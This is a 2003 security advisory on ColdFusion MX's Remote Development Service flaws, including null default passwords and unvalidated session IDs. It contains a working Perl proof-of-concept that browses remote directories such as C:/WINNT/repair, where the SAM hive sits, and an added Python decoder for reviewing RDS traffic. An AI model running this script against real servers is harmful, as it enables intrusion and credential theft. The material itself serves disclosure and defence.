- -- ------------------------- -- -
[>(] AngryPacket Security Advisory [>(]
- -- ------------------------- -- -

+--------------------- -- -
+ advisory information
+------------------ -- -

Exploit Code: Victim1
Initial Bug Report By: rs2112
release date: 06/26/2003

+------------------- -- -
+ timeline of Vendor Notification
+------------------- -- -

1:  Initial Email - Remote RDS problem and sample runtime exploit code
    -> Sun Jun 29 18:30:21 CDT 2003
1a: Status: (mon) No Response
2:  Call Macromedia - Get treated like a peckerhead and no one cares...
    -> Monday 4:00pm cali time
    -> Email: PR -> 4:30 pm cali time.
2a: Next day ( tues )... No one responds... Oh well, post code.

+-------------------- -- -
+ product information
+----------------- -- -

software:    Cold Fusion server
vendor:      Macromedia
homepage:    http://www.macromedia.com
description: With ColdFusion MX, you can build and deploy powerful web applications and web services with far less training time and fewer lines of code than ASP, PHP, and JSP. Now available in versions that support industry leading J2EE application servers, ColdFusion MX enables web application developers to easily harness the power of the Java platform.

+---------------------- -- -
+ vulnerability details
+------------------- -- -

problem1: Default Remote Development Service (RDS) configuration ( read, write, retrieve )
problem2: ASP SESSION ID's are not validated.
affected: Cold Fusion Server MX

explanation:

ColdFusion RDS allows developers to securely access remote files and data sources, and debug CFML code. Developers can use RDS through ColdFusion Studio, HomeSite+, and Dreamweaver MX to access files and databases on a remote ColdFusion development server using HTTP. Under CF 4.5/5, RDS ran as a service; under CFMX, RDS is a Java servlet that runs under the context of the CF Application service account. In both cases, by default, RDS has LocalSystem authority to the box.

When properly configured, RDS requires a (static) password to authenticate the remote developer. The first vulnerability (1) is that, due to this level of access, a remote user can reconfigure their website properties to access (put and get) any file on the CF server. The second vulnerability (2) is that, by default, RDS does not require a password for authentication (null password). Therefore, anyone with an RDS-compatible development application can attach to a CF server running RDS, authenticate with a blank password, and own the box. The third vulnerability (3) is that when the RDS password is set, it is sent over the wire in clear text.

risk:    High
status:  Awaiting vendor response. ( Read Timeline: Above )
exploit: As a proof of concept, Victim1 has developed beta code that can be used to exploit the RDS password vulnerability. The code demonstrates the fact that it would be a trivial task to scan the Internet, determine which servers are running CF, and compromise the box.

fix:
Vulnerability 1 - use a dedicated service account with restricted access to the server.
Vulnerability 2 - set the d*mn password
Vulnerability 3 - ASP SESSION ID not validated.
Vulnerability 4 - ??

+-------- -- -
+ credits
+----- -- -

Vulnerability reported by rs2112.
Exploit code developed by Victim1 of AngryPacket Security group.

+--------------
+ exploit:
+-------------

#!/usr/bin/perl
# RDS_c_Dump.pl
# victim1@angrypacket.com
#
## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or a modification of this code you are completely on your OWN,
# I or rs2112 take no responsibility for your stupid actions, A JUST BE KNOWN ! This is meant for administrators to protect themselves against
# attack and that's it.
#
## CF 6 MX Server does several things in order to get the remote dir structure so we will need
# to recreate these functions. This is an "almost" complete emulation of a Dreamweaver client connection just FYI,
# in like one full HTTP/1.1 session within netcat.
#
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
#
# Also I would like to say Macromedia's phone support sucks ass, I called trying to be a nice guy ( to follow up on email ) and
# they attempted to belittle my intelligence on the phone... OH and yes I did email them several times with no response.
#
# You can Write as well, I have tested and this works fine. If you change the file to an *.exe it will attempt to become a
# 16bit dos application on the remote box FYI.
#
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
#
# ANOTHER NOTE:
# Due to certain current situations I am not allowed to release full exploit code with ( READ, RETRIEVE, WRITE ) functions, I have fully working code,
# If you email me I will not send it to you, so basically don't bother.
#
# I'm sorry for being such a foil fart but hey, you understand I'm sure.
#
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
#
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
#
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
#
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
#
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------

use strict;
use IO::Socket;
use vars qw($response @clength @rarray);

## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#2:  3:STR:7:C:/_mm/STR:1:*STR:0:                                 Content-Length: 28
#3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:              Content-Length: 47
#4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#5:  3:STR:10:C:/_notes/STR:1:*STR:0:                             Content-Length: 32
#6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0            Content-Length: 50
#7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:          Content-Length: 51
#9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0:                                     Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:        Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:        Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:          Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:                            Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:              Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:                        Content-Length: 37
#
# Static Content-Length: $string_val. If you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.

# Content-Length header for each request string below (same order as @rarray).
@clength = (
    "Content-Length: 46",
    "Content-Length: 28",
    "Content-Length: 47",
    "Content-Length: 46",
    #"Content-Length: 32",
    #"Content-Length: 50",
    "Content-Length: 46",
    "Content-Length: 51",
    "Content-Length: 46",
    "Content-Length: 24",
    "Content-Length: 46",
    "Content-Length: 53",
    "Content-Length: 46",
    "Content-Length: 53",
    "Content-Length: 46",
    "Content-Length: 51",
    "Content-Length: 46",
    "Content-Length: 29",
    "Content-Length: 46",
    "Content-Length: 37"
);

# Request bodies sent to ide.cfm, in the order Dreamweaver sends them.
@rarray = (
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:7:C:/_mm/STR:1:*STR:0:",
    "3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    #"3:STR:10:C:/_notes/STR:1:*STR:0:",
    #"5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:3:C:/STR:1:*STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:8:C:/WINNTSTR:1:*STR*STR:0:",
    "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
    "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
);

system("clear");

# change target addy below.
my $TARGET = "192.168.0.100";
my $PORT   = "80";
my $STRING = "C:/WINNT/repair";
my $POST   = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";

print "Generating Socket with Array Directory Values.\n";

# one connection per request string, paired with its Content-Length header
for my $i ( 0 .. $#rarray ) {
    gen_sock( $TARGET, $PORT, $rarray[$i], $clength[$i] );
}

sub gen_sock {
    my ( $target, $port, $request, $clen ) = @_;
    my $sock = IO::Socket::INET->new(
        PeerAddr => $target,
        PeerPort => $port,
        Proto    => 'tcp',
    );
    die "Socket Could not be established ! $!" unless $sock;

    print "Target: $target:$port\n";
    print "$POST\n";
    print "Request String Value: $request\n";
    print "$clen\n";
    print "Please wait.. ..\n";

    # headers as sent by the Dreamweaver RDS client
    print $sock "$POST";
    print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
    print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
    print $sock "Host: $target\r\n";
    print $sock "$clen\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    print $sock "Cookie: ASPSESSIONIDQQQQGLDK=LPIHIKCAECKACDGPJCOLOAOJ\r\n";
    print $sock "\r\n";
    print $sock "$request";

    # let's return and print data to term
    while ( $response = <$sock> ) {
        chomp($response);
        print "$response\n";
    }
    close($sock);
}

+----------- -- -
+ disclaimer
+-------- -- -

READ IN THE SCRIPT.

Oh and Happy 4th of July !

- -- -------------------------
#EOT
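The advisory's captures show two wire formats: the request body that Dreamweaver posts to ide.cfm ("3:STR:15:C:/WINNT/repairSTR:1:*STR:0:") and the BrowseDir_Studio reply ("50:2:F:11:autoexec.nt1:63:4383:0,0..."). The decoder below is an added example for reviewing captured or logged RDS traffic; it is not AngryPacket's script or Macromedia's code. The layouts are read off the captures above; the names given to the response fields other than type and name (attr, size, extra) are assumptions, and the sample request and response are constructed from the advisory's own script and output.

```python
"""Decoder for the ColdFusion MX RDS wire format shown in the advisory's captures.

Added example; not AngryPacket's script. The request layout ("N:STR:len:value...")
and the BrowseDir_Studio response layout ("count:len:value...") are read off the
advisory's captures; the meaning of the response fields other than type and name
is an assumption and is labelled as such below."""
import re
from urllib.parse import parse_qs, urlsplit

_LEN = re.compile(r"(\d+):")      # "<len>:" prefix used in responses
_STR = re.compile(r"STR:(\d+):")  # "STR:<len>:" prefix used in requests


def _take(body, pos, n):
    """Slice n characters at pos, refusing to read past the end of the buffer."""
    value = body[pos:pos + n]
    if len(value) != n:
        raise ValueError(f"length prefix {n} at offset {pos} runs past end of data")
    return value, pos + n


def decode_request(body):
    """Parse a request body such as '3:STR:15:C:/WINNT/repairSTR:1:*STR:0:'.

    Returns (declared_count, args). The leading integer is reported as sent rather
    than trusted: the advisory's captures include bodies whose count disagrees with
    the number of STR tokens, so a consumer must walk the tokens to the end."""
    m = _LEN.match(body)
    if not m:
        raise ValueError("missing leading argument count")
    declared, pos, args = int(m.group(1)), m.end(), []
    while pos < len(body):
        m = _STR.match(body, pos)
        if not m:
            raise ValueError(f"expected STR:<len>: at offset {pos}")
        value, pos = _take(body, m.end(), int(m.group(1)))
        args.append(value)
    return declared, args


def decode_browse_response(body, fields_per_entry=5):
    """Parse a BrowseDir_Studio response into one dict per directory entry.

    The capture in the advisory has a leading field count followed by 'len:value'
    pairs, five per entry: 'F:', the name, a one-character field, a number that is
    consistent with the size in bytes, and '0,0'. Only 'type' and 'name' are
    certain; 'attr', 'size' and 'extra' are assumed names for the other fields."""
    m = _LEN.match(body)
    if not m:
        raise ValueError("missing leading field count")
    count, pos, fields = int(m.group(1)), m.end(), []
    while pos < len(body):
        m = _LEN.match(body, pos)
        if not m:
            raise ValueError(f"expected <len>: at offset {pos}")
        value, pos = _take(body, m.end(), int(m.group(1)))
        fields.append(value)
    if len(fields) != count or count % fields_per_entry:
        raise ValueError(f"declared {count} fields, found {len(fields)}")
    entries = []
    for i in range(0, count, fields_per_entry):
        kind, name, attr, size, extra = fields[i:i + fields_per_entry]
        entries.append({"type": kind, "name": name, "attr": attr,
                        "size": int(size), "extra": extra})
    return entries


def classify_request(raw):
    """Summarise a raw HTTP request (the text the advisory's script writes to its
    socket) if it targets the RDS servlet, else return None.

    Useful when reviewing captured traffic: it tells you which ACTION was invoked,
    which arguments (path, mask) the client sent, which User-Agent claimed to send
    it, and whether the Content-Length header matched the body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    url = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(url.query).items()}
    if not url.path.lower().endswith("/cfide/main/ide.cfm") or query.get("CFSRV") != "IDE":
        return None
    headers = dict(line.split(": ", 1) for line in header_lines if ": " in line)
    _declared, args = decode_request(body)
    return {"method": method, "action": query.get("ACTION"), "args": args,
            "user_agent": headers.get("User-Agent"),
            "content_length_ok": headers.get("Content-Length") == str(len(body.encode()))}


# Constructed from the advisory's script and sample output.
SAMPLE_REQUEST = (
    "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n"
    "Content-Type: application/x-ColdFusionIDE\r\n"
    "User-Agent: Dreamweaver-RDS-SCM1.00\r\n"
    "Host: 192.168.0.100\r\n"
    "Content-Length: 37\r\n"
    "\r\n"
    "3:STR:15:C:/WINNT/repairSTR:1:*STR:0:"
)
SAMPLE_RESPONSE = (
    "50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,0"
    "2:F:10:ntuser.dat1:66:1187843:0,02:F:3:sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,0"
    "2:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:software1:67:65331203:0,0"
    "2:F:6:system1:66:9748483:0,0"
)

if __name__ == "__main__":
    print(classify_request(SAMPLE_REQUEST))
    for entry in decode_browse_response(SAMPLE_RESPONSE):
        print(f"{entry['type']} {entry['name']:<14} {entry['size']:>8}")
```

Run against the advisory's own capture, decode_browse_response yields ten entries whose fourth field matches plausible file sizes (autoexec.nt 438, system 974848), which is why that field is labelled size. The parser is strict: every length prefix must fit inside the buffer and the declared field count must match, so the advisory's request #18 as transcribed ("*STR*STR:0:") is rejected rather than silently accepted. classify_request is the piece to run over a proxy or packet capture when checking whether a ColdFusion MX host is receiving RDS traffic it should not be.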